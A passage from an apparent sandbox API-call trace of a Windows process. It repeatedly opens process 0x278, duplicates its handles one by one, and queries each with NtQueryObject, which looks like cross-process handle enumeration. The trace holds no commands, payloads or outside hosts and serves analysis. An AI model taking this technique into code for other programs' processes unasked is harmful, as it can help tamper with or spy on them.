lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.956] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.956] CloseHandle (hObject=0x1b8) returned 1 [0113.956] CloseHandle (hObject=0x198) returned 1 [0113.956] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.957] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x394, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.957] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.957] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.957] CloseHandle (hObject=0x1b8) returned 1 [0113.957] CloseHandle (hObject=0x198) returned 1 [0113.957] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.957] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.958] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.958] CloseHandle (hObject=0x1b8) returned 1 [0113.958] CloseHandle (hObject=0x198) returned 1 [0113.958] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.958] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.958] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.958] CloseHandle (hObject=0x1b8) returned 1 [0113.959] CloseHandle (hObject=0x198) returned 1 [0113.959] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.959] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.959] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.959] CloseHandle (hObject=0x1b8) returned 1 [0113.959] CloseHandle (hObject=0x198) returned 1 [0113.959] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.959] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.959] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.960] CloseHandle (hObject=0x1b8) returned 1 [0113.960] CloseHandle (hObject=0x198) returned 1 [0113.960] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.960] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.960] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.960] CloseHandle (hObject=0x1b8) returned 1 [0113.960] CloseHandle (hObject=0x198) returned 1 [0113.960] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.960] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.961] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.961] CloseHandle (hObject=0x1b8) returned 1 [0113.961] CloseHandle (hObject=0x198) returned 1 [0113.961] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.961] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.971] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.972] CloseHandle (hObject=0x1b8) returned 1 [0113.972] CloseHandle (hObject=0x198) returned 1 [0113.972] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.972] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.972] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.972] CloseHandle (hObject=0x1b8) returned 1 [0113.972] CloseHandle (hObject=0x198) returned 1 [0113.972] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.973] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.973] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.973] CloseHandle (hObject=0x1b8) returned 1 [0113.973] CloseHandle (hObject=0x198) returned 1 [0113.973] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.973] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.974] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.974] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.974] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.974] CloseHandle (hObject=0x1b8) returned 1 [0113.974] CloseHandle (hObject=0x198) returned 1 [0113.974] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.974] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.974] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.975] CloseHandle (hObject=0x1b8) returned 1 [0113.975] CloseHandle (hObject=0x198) returned 1 [0113.975] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.975] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.975] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.975] CloseHandle (hObject=0x1b8) returned 1 [0113.975] CloseHandle (hObject=0x198) returned 1 [0113.975] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.975] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.975] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.976] CloseHandle (hObject=0x1b8) returned 1 [0113.976] CloseHandle (hObject=0x198) returned 1 [0113.976] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.976] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.976] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.976] CloseHandle (hObject=0x1b8) returned 1 [0113.976] CloseHandle (hObject=0x198) returned 1 [0113.976] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.977] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.977] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.977] CloseHandle (hObject=0x1b8) returned 1 [0113.977] CloseHandle (hObject=0x198) returned 1 [0113.977] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.977] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.977] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.978] CloseHandle (hObject=0x1b8) returned 1 [0113.978] CloseHandle (hObject=0x198) returned 1 [0113.978] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.978] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.978] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.978] CloseHandle (hObject=0x1b8) returned 1 [0113.978] CloseHandle (hObject=0x198) returned 1 [0113.978] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.978] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.979] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.979] CloseHandle (hObject=0x1b8) returned 1 [0113.979] CloseHandle (hObject=0x198) returned 1 [0113.979] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.979] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.979] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.979] CloseHandle (hObject=0x1b8) returned 1 [0113.980] CloseHandle (hObject=0x198) returned 1 [0113.980] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.980] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.980] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.980] CloseHandle (hObject=0x1b8) returned 1 [0113.980] CloseHandle (hObject=0x198) returned 1 [0113.980] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.980] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.980] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.981] CloseHandle (hObject=0x1b8) returned 1 [0113.981] CloseHandle (hObject=0x198) returned 1 [0113.981] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.981] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.981] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.981] CloseHandle (hObject=0x1b8) returned 1 [0113.982] CloseHandle (hObject=0x198) returned 1 [0113.982] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.982] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.982] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.982] CloseHandle (hObject=0x1b8) returned 1 [0113.982] CloseHandle (hObject=0x198) returned 1 [0113.982] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.982] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.982] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.983] CloseHandle (hObject=0x1b8) returned 1 [0113.983] CloseHandle (hObject=0x198) returned 1 [0113.983] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.983] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.983] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.983] CloseHandle (hObject=0x1b8) returned 1 [0113.984] CloseHandle (hObject=0x198) returned 1 [0113.984] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.984] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.984] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.984] CloseHandle (hObject=0x1b8) returned 1 [0113.984] CloseHandle (hObject=0x198) returned 1 [0113.984] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.984] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.984] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.985] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.985] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.985] CloseHandle (hObject=0x1b8) returned 1 [0113.985] CloseHandle (hObject=0x198) returned 1 [0113.985] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.985] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x408, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.985] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.985] CloseHandle (hObject=0x1b8) returned 1 [0113.986] CloseHandle (hObject=0x198) returned 1 [0113.986] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.986] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.986] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.986] CloseHandle (hObject=0x1b8) returned 1 [0113.986] CloseHandle (hObject=0x198) returned 1 [0113.986] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.986] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x410, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.986] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.987] CloseHandle (hObject=0x1b8) returned 1 [0113.987] CloseHandle (hObject=0x198) returned 1 [0113.987] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.987] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.987] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.987] CloseHandle (hObject=0x1b8) returned 1 [0113.987] CloseHandle (hObject=0x198) returned 1 [0113.987] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.988] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.988] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.988] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.988] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.988] CloseHandle (hObject=0x1b8) returned 1 [0113.988] CloseHandle (hObject=0x198) returned 1 [0113.988] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.988] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.989] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.989] CloseHandle (hObject=0x1b8) returned 1 [0113.989] CloseHandle (hObject=0x198) returned 1 [0113.989] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.989] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.989] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.989] CloseHandle (hObject=0x1b8) returned 1 [0113.989] CloseHandle (hObject=0x198) returned 1 [0113.989] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.990] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.990] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.990] CloseHandle (hObject=0x1b8) returned 1 [0113.990] CloseHandle (hObject=0x198) returned 1 [0113.990] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.990] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x428, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.990] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.990] CloseHandle (hObject=0x1b8) returned 1 [0113.991] CloseHandle (hObject=0x198) returned 1 [0113.995] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.995] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x42c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.995] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, 